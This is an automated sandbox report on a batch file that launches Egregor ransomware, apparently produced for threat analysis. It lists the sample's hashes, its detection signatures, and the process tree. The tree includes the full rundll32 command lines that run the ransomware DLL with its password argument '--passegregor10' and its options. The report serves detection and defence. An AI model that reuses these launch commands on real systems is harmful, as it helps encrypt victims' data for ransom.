Analysis

  • max time kernel
    438s
  • max time network
    374s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    04-11-2020 18:18

General

  • Target

    spr2.bat

  • Size

    98B

  • MD5

    2d88b7d73bd4e059ecd6cc0e14f8f27e

  • SHA1

    beca0cb2744e7b031434455e1725b378faa8ccf2

  • SHA256

    7d744d7f6f2b68a9984afb859308e88dfcff1b03b2d8ab40cefcd448fda3d876

  • SHA512

    36c21edd458398f7e2cf4e2a520c36546d246b2894e8b69443ff14ffda8613b5002d0fd110517e1e2800eca6106fec996d986781788f9ef0f2b8641396ff19ce

Score
10/10

Malware Config

Signatures

  • Egregor Ransomware

    Variant of the Sekhmet ransomware first seen in September 2020.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\spr2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1144
    • C:\Windows\system32\rundll32.exe
      rundll32.exe "\\SRV01QW\sp\b.dll",DllRegisterServer --passegregor10 --append="antani" --multiproc
      2⤵
      PID:2412
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:672
  • C:\Windows\System32\NOTEPAD.EXE
    "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\spr2.bat
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:236
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\spr2.bat" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Windows\system32\rundll32.exe
      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\b.dll",DllRegisterServer --passegregor10 --append="antani" --multiproc
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1424
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\b.dll",DllRegisterServer --passegregor10 --append="antani" --multiproc
        3⤵
        PID:1640

Network

MITRE ATT&CK Matrix


Downloads

  • C:\Users\Admin\AppData\Local\Temp\spr2.bat
    MD5

    06601f912c2218111426670b30510d68

    SHA1

    fd4c25dd29d0a7dab5e095d4317a983fe9615caf

    SHA256

    9a97e6034d4c7cc94ba3c6ac6306f7e278609d7e3fcc50e6d3afc0b972cb8549

    SHA512

    e614ed7a62b81c1ccaecb4a9a70158568db1fb50b85d41607d9d6b1628f015c8fd7e655f5ff613047e0ba918f5588508ac7a42f323f814e51b3a8b7f0859d214

  • memory/1424-2-0x0000000000000000-mapping.dmp
  • memory/1640-3-0x0000000000000000-mapping.dmp
  • memory/1640-4-0x0000000004A20000-0x0000000004A5F000-memory.dmp
    Filesize

    252KB

  • memory/2412-0-0x0000000000000000-mapping.dmp